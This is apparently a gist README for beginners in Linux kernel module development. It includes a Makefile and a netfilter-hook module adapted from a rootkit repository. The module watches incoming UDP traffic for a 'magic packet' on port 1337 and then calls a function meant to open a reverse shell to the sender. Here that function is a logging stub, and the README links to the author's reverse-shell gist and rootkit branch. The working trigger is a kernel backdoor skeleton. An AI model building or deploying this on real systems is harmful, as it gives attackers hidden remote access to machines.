LKM Loadable Kernel Modules in Linux

README.md

LKM - Loadable Kernel Modules in Linux

Some code taken from other sources(others repo's, gist's), sites, courses, and so on. And some code is made and/or modified by me; :warning: note - any of this is not perfect; I make this gist to some friends which asked me for some beginner lkm dev;

Networking - NF Hook

⚠️ taken and modified from nisay759/linux-rootkits
And some more sources;

Makefile

obj-m+=project.o
all:
	make -C /lib/modules/$(shell uname -r)/build/ \
	M=$(PWD) modules
clean:
	make -C /lib/modules/$(shell uname -r)/build/ \
	M=$(PWD) clean
test:
	@echo ""
	@echo "sudo dmesg -C"
	@echo "sudo dmesg"
	@echo "sudo insmod project.ko p1=\"xyz123\""
	@echo "echo 'a' >> /dev/udp/127.0.0.1/1337"
	@echo "sudo rmmod project.ko"
	@echo "sudo dmesg"
	@echo ""

LKM

/*
lsmod|grep -i --color "project"
sudo grep -i --color "project" /var/log/kern.log

# TESTRUN
# follow the makefile's instructions  (output)

$ make clean
$ make
$ make test

input:
    sudo dmesg -C
    sudo dmesg
    sudo insmod project.ko p1="xyz123"
    echo 'a' >> /dev/udp/127.0.0.1/1337
    sudo rmmod project.ko
    sudo dmesg

output:
[+] project: Loaded 
[*] module parameter p1 = xyz123
  [+] project: nfhook a
    [+]NFhook: received magic packet
  (*)  invoke.reverse.shell. with: ip=127.0.0.1, port=1337
  [-] project: nfhook b
[-] project: Unloaded
*/

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/ip.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
#include <linux/skbuff.h>
#include <linux/udp.h>
#include <linux/kmod.h>
#include <linux/preempt.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("Author");
MODULE_DESCRIPTION("Desc");
MODULE_VERSION("1.0");

#define MSG_Loaded    printk(KERN_INFO "[+] project: Loaded \n");
#define MSG_UnLoaded  printk(KERN_INFO "[-] project: Unloaded\n");
#define MSG_nf_hook_a printk(KERN_INFO "  [+] project: nfhook a\n");
#define MSG_nf_hook_b printk(KERN_INFO "  [-] project: nfhook b\n");

static char *p1="default_value";
module_param(p1, charp, S_IRUGO);
MODULE_PARM_DESC(p1, "p1 description");

//TODO
// I will re-write this instead of using 
// an usermode applciation.
// See the original repo for the 
// original code of the function
static int invoke_reverse_shell(char *ip, char *port){
    printk(KERN_INFO "  (*)  invoke.reverse.shell. with: ip=%s, port=%s\n",ip,port);
    return 0; // for now.
}

static unsigned int rk_hook(void *priv, struct sk_buff *skb, const struct nf_hook_state *state){
	if(!skb) {return NF_ACCEPT;                               }
	struct iphdr *ip_header = ip_hdr(skb);
	if(!ip_header || !ip_header->protocol){ return NF_ACCEPT; }
	if(ip_header->protocol != 17) {return NF_ACCEPT;          }
	struct udphdr *udp_header = udp_hdr(skb);
	unsigned int dst_prt = (unsigned int)ntohs(udp_header->dest);
	/* Max ip length : "xxx.xxx.xxx.xxx\0" */
	char ip[16];
	/* Max port length : "65535\0" */
	char port[6];
	//TODO
	if(dst_prt == 1337){
		pr_info("    [+]NFhook: received magic packet\n");
		snprintf(ip, sizeof(ip), "%pI4", &ip_header->saddr);
		snprintf(port, sizeof(port), "%u", dst_prt);
		preempt_disable();
	  
	  if (invoke_reverse_shell(ip, port) < 0)  {
		    pr_info("    [*] invoke_reverse_shell fail\n");
		  }
		  
	  preempt_enable();
		return NF_DROP;
	}
	return NF_ACCEPT;
}

static struct nf_hook_ops rk_pre_routing = {
	.hook = rk_hook,
	.hooknum = NF_INET_PRE_ROUTING,
	.pf = PF_INET,
	.priority = NF_IP_PRI_FIRST,
};


int init_module(void){
	MSG_Loaded;
	printk(KERN_INFO "[*] module parameter p1 = %s\n",p1);
	
	nf_register_net_hook(&init_net,&rk_pre_routing);
	MSG_nf_hook_a;
    
    return 0;
}

void cleanup_module(void){
    nf_unregister_net_hook(&init_net,&rk_pre_routing);
	MSG_nf_hook_b
	
	MSG_UnLoaded;
}

Related links

My Pull Request (currently pending ..)

• nisay759/linux-rootkits#4

My 'patch-5' branch of Nisay's rootkits:

• https://github.com/loneicewolf/linux-rootkits/tree/patch-5

---

testing own reverse shell (updated - now with inputs) in this linux lkm:

• https://gist.github.com/loneicewolf/8232aad5722e1e7de9d92932b5a01597

Expand todo

• add dropdowns
• add footnotes
• add "copy contents" button (?)
• (reliable) related links
• scripts (to automate, build, load, unload, configure, template, structure, searchers)
• pitfalls
• notation (symbols,keywords, "emojis", colors, ..., . )
• clean up.

• SimpleDropdown

• md_footnotes.md

Expand todo: pitfalls

• includes
• using/calling wrong function/file
• reboot required/snapshot/checkpoint restore (if crashy/unstable)
• Null's, newlines, \*, not =0 when one should do;
• order (in some cases) of functions (note - mostly in normal C usermode programming but)

Expand todo: misc

• easy future maintainable (e.g when done with a project, generalize it, simplify it, apply best practices, etc. Document. Include "supported versions", and so on.)

• Naming. Name things well.

• Know when to use (and change to the better)

• //

• or

• /**/